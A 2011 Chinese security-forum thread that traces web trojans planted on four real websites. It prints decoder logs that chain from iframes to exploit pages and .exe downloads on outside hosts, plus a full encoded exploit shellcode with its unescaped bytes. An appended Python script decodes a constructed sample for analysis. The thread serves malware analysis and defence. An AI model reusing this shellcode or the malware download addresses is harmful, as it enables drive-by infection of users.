瑞星卡卡安全论坛 (Rising Kaka Security Forum)

Rising daily website security report (18 March 2011)
networkedition - 2011-3-18 10:27:00


Quote:
The URLs all come from the Rising daily security report; we analyse in detail the malicious URLs planted on them, and malicious URLs that are already dead are not analysed further.



Quote:
Note: the malicious URLs in the analyses below contain real web trojan download addresses; do not download and run them directly, or your system will get infected.



Quote:

1.  http://health.china.com/ (China.com Health Channel, a professional health portal)
2.  http://www.cxkx.gov.cn/ (Changxing Farmers' Prosperity Network)
3.  http://www.hcit.edu.cn/ (Welcome to Huai'an Vocational College of Information Technology)
4.  http://www.qzkx.gov.cn/ (Quzhou Municipal Association for Science and Technology)


User system information: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2011-3-18 10:28:00
Log generated by networkedition use mdecoder 0.67
[root]http://health.china.com/html/jiankangzhuanti/hblz/201009/02-79398.html(红斑狼疮发病年龄、种族、地区上有无差别?-中华网健康频道)
    [script]http://health.china.com/js/art_msn.js
    [script]http://health.china.com/templets/user_login.php
    [iframe]http://goon.27.cn/js/headad3.htm
        [script]http://cbjs.baidu.com/js/m.js
            [script]http://cbjs.baidu.com/js/+
    [iframe]http://goon.27.cn/js/headad2.htm
        [script]http://cbjs.baidu.com/js/m.js
    [iframe]http://goon.27.cn/js/headad1.htm
        [script]http://cbjs.baidu.com/js/m.js
    [iframe]http://goon.27.cn/js/top950.htm
        [script]http://cbjs.baidu.com/js/m.js
    [script]http://gogo.27.cn/js/7120_left_2.js
    [script]http://health.china.com/js/art_l_ad.js
    [script]http://health.china.com/js/hbht.js
        [iframe]http://goon.27.cn/js/newleft600.html
            [iframe]http://goon.27.cn/js/newleft600.asp
                [iframe]http://goon.27.cn/js/newleft600bj.htm
        [iframe]http://www.333eee.com/z.html
            [script]http://js.users.51.la/4472035.js
            [exp]http://ispm.3322.org:54321/wmzuo/zz.html(Exploit.Ie0dayCVE0806.a)
                [script]http://ispm.3322.org:54321/wmzuo/yt.jpg
                [virus]http://58.221.33.206:54321/zuo.exe
    [script]http://gogo.27.cn/js/7120_left_3.js
    [script]http://gogo.27.cn/js/7120_left_4.js
    [script]http://health.china.com/js/rmss.js
    [script]http://gogo.27.cn/js/7120_left_5.js
    [script]http://goon.27.cn/js/7120_left_gjc_6.js
    [script]http://health.china.com/js/art_r_ad.js
        [iframe]http://goon.27.cn/js/fq/article_r_ad.htm
            [iframe]http://goon.27.cn/js/fq/article_r_ad.asp
                [iframe]http://goon.27.cn/js/fq/article_r_ad_bj.htm
    [script]http://health.china.com/js/art_r_topnew.js
    [script]http://health.china.com/js/xtup.js
        [iframe]http://health.china.com/js/xtup.htm
    [iframe]http://goon.27.cn/js/right300.htm
        [iframe]http://goon.27.cn/js/right300.asp
            [script]http://cbjs.baidu.com/js/m.js
    [script]http://goon.27.cn/js/7120_right_hk.js
    [script]http://health.china.com/js/art_zttj.js
    [script]http://gogo.27.cn/js/7120_right_2.js
    [script]http://goon.27.cn/js/7120_right_7.js
    [script]http://gogo.27.cn/js/7120_right_4.js
    [script]http://health.china.com/js/new_tf_adv.js
networkedition - 2011-3-18 10:28:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.cxkx.gov.cn/editor/css/best/lzg.htm
    [script]http://www.cxkx.gov.cn/editor/css/best/lzg.js
    [script]http://js.users.51.la/4036725.js
    [exp]http://www.cxkx.gov.cn/editor/css/mm/wmdn.html(Exploit.Ie0dayCVE0806.a)
        [virus]http://www.bjsjwmz.com/upload_files/dn.exe
    [exp]http://www.cxkx.gov.cn/editor/css/mm/wmdn1.html(Exploit.Ie0dayCVE0806.a)
        [virus]http://www.bjsjwmz.com/upload_files/lzg.exe
networkedition - 2011-3-18 10:28:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.hcit.edu.cn/hcit2009/admin/inc/jjl/1.html(Exploit.Ie0dayCVE0806.a)
    [virus]http://qq.sbwanwan.com:9999/ll.exe
networkedition - 2011-3-18 10:29:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.qzkx.gov.cn/inc/sgsj.htm?from=www.tzgtj.gov.cn
    [script]http://www.qzkx.gov.cn/inc/sgsj.js
    [script]http://js.users.51.la/4404580.js
    [exp]http://www.qzkx.gov.cn/inc/wmsgsj.html(Exploit.Ie0dayCVE0806.a)
        [script]http://www.qzkx.gov.cn/inc/yt.jpg
        [virus]http://www.bjsjwmz.com/upload_files/sgsj.exe
from_zo - 2011-3-18 16:46:00
Boss,
The first one:
[script]http://health.china.com/js/hbht.js
        [iframe]http://goon.27.cn/js/newleft600.html
            [iframe]http://goon.27.cn/js/newleft600.asp
                [iframe]http://goon.27.cn/js/newleft600bj.htm
        [iframe]http://www.333eee.com/z.html
A freshow check shows nothing at all. After I downloaded the hbht.js file I could only see the first iframe, not the second one (the 333eee iframe). Did the admin remove the trojan? But when I visit hbht.js directly, 360 blocks it and says http://www.333eee.com/z.html is a malicious page. Please help!
networkedition - 2011-3-18 16:48:00
It is probably checking a cookie.
from_zo - 2011-3-18 16:51:00
The second one: when checking http://www.cxkx.gov.cn/editor/css/mm/wmdn.html, freshow crashed, heh. I tried several times and it happens every time. Boss, how did you get around it?
Thanks
from_zo - 2011-3-18 16:53:00
How do you tell it is checking a cookie? I'm a newbie when it comes to cookies ^_^
networkedition - 2011-3-18 17:00:00
It works fine for me; try switching to a different decoder or md.
networkedition - 2011-3-18 17:01:00
The malicious link should be in the page source; clear your cookies and look again.
from_zo - 2011-3-18 17:37:00
You mean clearing the browser's cookies? I tried that and check still can't get the source :kaka4:
Could you explain in a bit more detail? Thanks!
from_zo - 2011-3-18 17:53:00
After check, decrypt using the value of var aaa4:
%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8'+ppsa+'%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDBE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536
%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%ucccc%uce93%ucadf%ud3dc%udcca%u93d3%ud2de%u87d0%u8484%u8484%ud192%u93d1%uc5d8%uBDd8%uBD%uEAEA%uEAEA%uEAEA%uEAEA
After one unescape (ESC) pass:
\x58\x58\x58\x58\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\xB8\x03\x80\x34\x0B\xBD\xE2\xFA\xEB\x05\xE8\xEB'+ppsa+'\xFF\x54\xA3\xBE\xBD\xBD\xE2\xD9\x1C\x8D\xBD\xBD\xBD\x36\xFD\xB1\x36\xCD\xA1\x10\x36\xD5\xB5\x36\x4A\xD7\xAC\xE4\x55\x03\xBF\xBD\xBD\x2D\x5F\x45\xD5\x8E\x8F\xBD\xBD\xD5\xE8\xCE\xD8\xCF\xE9\x36\xFB\xB1\x55\x03\xBC\xBD\xBD\x36\x55\xD7\xB8\xE4\x55\x23\xBF\xBD\xBD\x5F\x44\xD5\xD2\xD3\xBD\xBD\xD5\xC8\xCF\xD1\xD0\xE9\x42\xAB\x38\x7D\xC8\xAE\xD5\xD2\xD3\xBD\xBD\xD5\xC8\xCF\xD1\xD0\xE9\x36\xFB\xB1\x55\x33\xBC\xBD\xBD\x36\x55\xD7\xBC\xE4\x55\xD3\xBF\xBD\xBD\x5F\x44\xD5\xD1\x8E\x8F\xBD\xD5\xCE\xD5\xD8\xD1\xE9\x36\xFB\xB1\x55\xD2\xBC\xBD\xBD\x36\x55\xD7\xBC\xE4\x55\xF2\xBF\xBD\xBD\x5F\x44\x3C\x51\xBD\xBC\xBD\xBD\x36\x61\x3C\x7E\x3D\xBD\xBD\xBD\xD7\xBD\xD7\xA7\xEE\xD7\xBD\x42\xEB\xE1\x8E\x7D\xFD\x3D\x81\xBE\xBD\xC8\x44\x7A\xB9\xBE\xE1\xDB\x93\xD8\x7A\xF9\xBE\xB9\xC5\xD8\xBD\xBD\x8E\x74\xEC\xEC\xEE\xEA\xEC\x8E\x7D\x36\xFB\xE5\x55\x9F\xBC\xBD\xBD\x3E\x45\xBD\x54\x1E\xBD\xBD\xBD\x2D\xD7\xBD\xD7\xBD\xD7\xBE\xD7\xBD\xD7\xBF\xD5\xBD\xBD\xBD\x7D\xEE\x36\xFB\x99\x55\xBC\xBC\xBD\xBD\x34\xFB\xDD\xD7\xBD\xED\x42\xEB\x95\x34\xFB\xD9\x36\xFB\xDD\xD7\xBD\xD7\xBD\xD7\xBD\xD7\xB9\xD7\xBD\xED\x42\xEB\x91\xD7\xBD\xD7\xBD\xD7\xBD\xD5\xA2\xBD\xB2\xBD\xED\x42\xEB\x81\x34\xFB\xC5\x36\xF3\xD9\x3D\xC1\xB5\x42\x09\xC9\xB1\x3D\xC1\xB5\x42\xBD\xC9\xB8\x3D\xC9\xB5\x42\x09\x5F\x56\x34\x3B\x3D\xBD\xBD\xBD\x7A\xFB\xCD\xBD\xBD\xBD\xBD\x7A\xFB\xC9\xBD\xBD\xBD\xBD\xD7\xBD\xD7\xBD\xD7\xBD\x36\xFB\xDD\xED\x42\xEB\x85\x36\x3B\x3D\xBD\xBD\xBD\xD7\xBD\x30\xF3\xC9\xEC\x42\xCB\xCD\xED\x42\xCB\xDD\x42\xEB\x8D\x42\xCB\xDD\x42\xEB\x89\x42\xCB\xC5\x42\xEB\xFD\x36\x46\x8E\x7D\x8E\x66\x3C\x51\xBD\xBF\xBD\xBD\x36\x71\x3E\x45\xE9\xC0\xB5\x34\xA1\xBC\x3E\x7D\xB9\x56\x4E\x36\x71\x36\x64\x3E\x7E\xAD\x8E\x7D\xED\xEC\xEE\xED\xED\xED\xED\xED\xED\xEA\xED\xED\x42\xEB\xB5\x36\xC3\xE9\x55\xAD\xBC\xBD\xBD\x55\xD8\xBD\xBD\xBD\xD5\xDE\xCB\xCA\xBD\xD5\xCE\xD5\xD9\xD2\xE9\x36\xFB\xB1\x55\x99\xBD\xBD\xBD\x34\xFB\x81\xD9\x1C\xB9\xBD\xBD\xBD\x30\x1D\xDD\x42\x42\x42\xD7\xD8\x42\xCB\x81\x36\xFB\xAD\x55\xB5\xBD\xBD\xBD\x8E\x66\xEE\xEE\xEE\xEE\x42\x6D\x3D\x85\x55\x3D\x85\x54\xC8\xAC\x3C\xC5\xB8\x2D\x2D\x2D\x2D\xC9\xB5\x36\x42\xE8\x36\x51\x30\xFD\xB8\x42\x5D\x55\x1B\xBD\xBD\xBD\x7E\x55\x1D\xBD\xBD\xBD\x05\xAC\xBC\xB9\x3D\x7F\xB1\xBD\x55\x2E\xBD\xBD\xBD\x3C\x51\xBD\xBC\xBD\xBD\x36\x41\x3E\x7A\xB9\x7A\xBA\x8F\xC9\x2C\xB1\x7A\xFA\xB9\xDE\x34\x6C\xF2\x7A\xFA\xB5\x1D\xD8\x2A\x76\x7A\xFA\xB1\xEC\xFD\x07\xC2\x7A\xFA\xAD\x83\xA0\x0B\x84\x7A\xFA\xA9\x05\xD4\x69\xA6\x7A\xFA\xA5\x03\xC2\xDB\x1D\x7A\xFA\xA1\x41\x14\x8A\x10\x7A\xFA\x9D\x25\xB7\xAD\x45\xD9\x1C\x8D\xBD\xBD\xBD\x36\xFD\xB1\x36\xCD\xA1\x10\x36\xD5\xB5\x36\x4A\xD7\xB9\xE4\x55\xE9\xBD\xBD\xBD\x2D\x5F\x45\xD5\x8E\x8F\xBD\xBD\xD5\xE8\xCE\xD8\xCF\xE9\x36\xBB\x55\xE8\x42\x42\x42\x36\x55\xD7\xB8\xE4\x55\x88\xBD\xBD\xBD\x5F\x44\x8E\x42\xEA\x42\xEB\xB9\x56\xBF\xE5\x7E\x55\x44\x42\x42\x42\xE6\x7B\xBA\x05\x34\xE2\xBC\xDB\x7A\xFA\xB8\x42\x5D\x7E\xEE\x36\x61\xEE\xD7\xFD\xD5\xBD\xAD\xBD\xBD\xEA\x36\xFB\x9D\x55\xA5\x42\x42\x42\xE5\x7E\xEC\xEB\x36\xC8\x81\x36\xC9\x93\xC5\xBE\x48\xEB\x36\xCB\x9D\xBE\x48\x8E\x74\xF4\xFC\x10\xBE\x78\x8E\x66\xB2\x03\xAD\x87\x6B\xC9\xB5\x7C\x76\xBA\xBE\x67\xFD\x56\x4C\x86\xA2\xC8\x5A\xE3\x36\xE3\x99\xBE\x60\xDB\x36\xB1\xF6\x36\xE3\xA1\xBE\x60\x36\xB9\x36\xBE\x78\x16\xE3\xE4\x7E\x55\x60\x41\x42\x42\x0F\x4F\x5F\x49\x84\x5F\xC0\x3E\x67\xF5\xC6\x80\x8F\xC9\x2C\xB1\x38\x62\x12\x06\xDE\x34\x6C\xF2\xEC\xFD\x07\xC2\x1D\xD8\x2A\x76\xA3\x19\xD9\x52\x2E\x8F\x59\x29\x33\xAE\xB7\x11\x7F\xA4\xF6\xBC\x79\x30\xA2\xC9\xEA\xDB\xB0\x42\xFE\x03\x11\x66\xC0\x4D\x18\x27\xEF\x43\x1A\x67\x83\xA0\x0B\x84\x05\xD4\x69\xA6\x03\xC2\xDB\x1D\x41\x14\x8A\x10\x25\xB7\xAD\x45\x3D\x6B\x12\x27\x46\xEE\xA8\xdb\xd5\xc9\xc9\xcd\x87\x92\x92\xcc\xcc\x93\xce\xdf\xca\xdc\xd3\xca\xdc\xd3\x93\xde\xd2\xd0\x87\x84\x84\x84\x84\x92\xd1\xd1\x93\xd8\xc5\xd8\xBD\x%u\xBDEAEA\xEA\xEA\xEA\xEA\xEA\xEA

Then decrypt it with enumXOR and you're done.
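As an added example (my own Python, not code from this thread and not from freshow, mdecoder or enumXOR), here is how the two decoding steps described in the post above can be reproduced offline for analysis: the %uXXXX escapes are first unescaped into raw little-endian bytes (the "one ESC pass"), then every single-byte XOR key is enumerated and ranked by how much readable content (URLs, .exe/.dll names, API names) it exposes, which is what an analyst needs in order to pull the download URL out of a blob like this without ever executing it. The payload bytes, the key 0x5A and the host dropper.invalid are all constructed for this example; nothing is taken from the dump above, and the scoring heuristic is mine, not a property of any of the named tools.

```python
import re

# All sample material below is constructed for this example; nothing here is
# taken from the thread's dump. The dropper host uses the reserved .invalid TLD.
SAMPLE_KEY = 0x5A
SAMPLE_PLAIN = (b"\x90\x90\x90\x90GET http://dropper.invalid/payload.exe\x00"
                b"kernel32.dll\x00")

def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the inner operation of an XOR enumeration."""
    return bytes(b ^ key for b in data)

def to_unicode_escapes(data: bytes) -> str:
    """Encode bytes as JavaScript %uXXXX tokens. Each token is a 16-bit unit
    holding two bytes little-endian, which is how a browser's unescape() lays
    the blob out in memory."""
    if len(data) % 2:
        data += b"\x00"          # pad to whole 16-bit units
    return "".join("%%u%02X%02X" % (data[i + 1], data[i])
                   for i in range(0, len(data), 2))

TOKEN_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def unescape_to_bytes(encoded: str) -> bytes:
    """Step one ('one ESC pass'): turn %uXXXX and %XX tokens into raw bytes.
    Anything that is not an escape (for instance the '+ppsa+' string
    concatenation left in the dump) is skipped."""
    out = bytearray()
    for m in TOKEN_RE.finditer(encoded):
        if m.group(1):
            unit = int(m.group(1), 16)
            out += bytes((unit & 0xFF, unit >> 8))   # little-endian 16-bit unit
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)

# Substrings that typically show up once a download-and-execute payload is decoded.
MARKERS = (b"http://", b".exe", b".dll", b"kernel32", b"urlmon", b"LoadLibrary")

def score_candidate(plain: bytes) -> int:
    """Heuristic: marker substrings weigh heavily, printable ASCII lightly."""
    hits = sum(plain.count(m) * 20 for m in MARKERS)
    printable = sum(1 for b in plain if 0x20 <= b < 0x7F)
    return hits + printable

def enum_xor(data: bytes, top: int = 3):
    """Step two ('enumXOR'): try all 256 single-byte keys and rank them.
    Returns (key, score, decoded) tuples, best first."""
    candidates = []
    for key in range(256):
        plain = xor_bytes(data, key)
        candidates.append((key, score_candidate(plain), plain))
    candidates.sort(key=lambda c: c[1], reverse=True)
    return candidates[:top]

def extract_strings(plain: bytes, min_len: int = 6):
    """Printable runs in the decoded blob: these are the IoCs an analyst wants."""
    return [s.decode("ascii")
            for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, plain)]

def analyse(encoded: str) -> dict:
    """Whole pipeline: unescape, enumerate XOR keys, report the best key's strings."""
    raw = unescape_to_bytes(encoded)
    key, score, plain = enum_xor(raw)[0]
    return {"key": key, "score": score, "strings": extract_strings(plain)}

if __name__ == "__main__":
    # Build a constructed blob in the same shape as the 'var aaa4' value, then decode it.
    blob = to_unicode_escapes(xor_bytes(SAMPLE_PLAIN, SAMPLE_KEY))
    print(blob[:60] + "...")
    result = analyse(blob)
    print("best key: 0x%02X" % result["key"])
    for s in result["strings"]:
        print("  ", s)
```

Feed `analyse()` the string value of the variable you recovered from the page source; a single-byte XOR is the common case this thread describes, and when no key produces marker strings the blob is most likely using a multi-byte key or a second encoding layer, which is the signal to look at the surrounding JavaScript again rather than at the bytes.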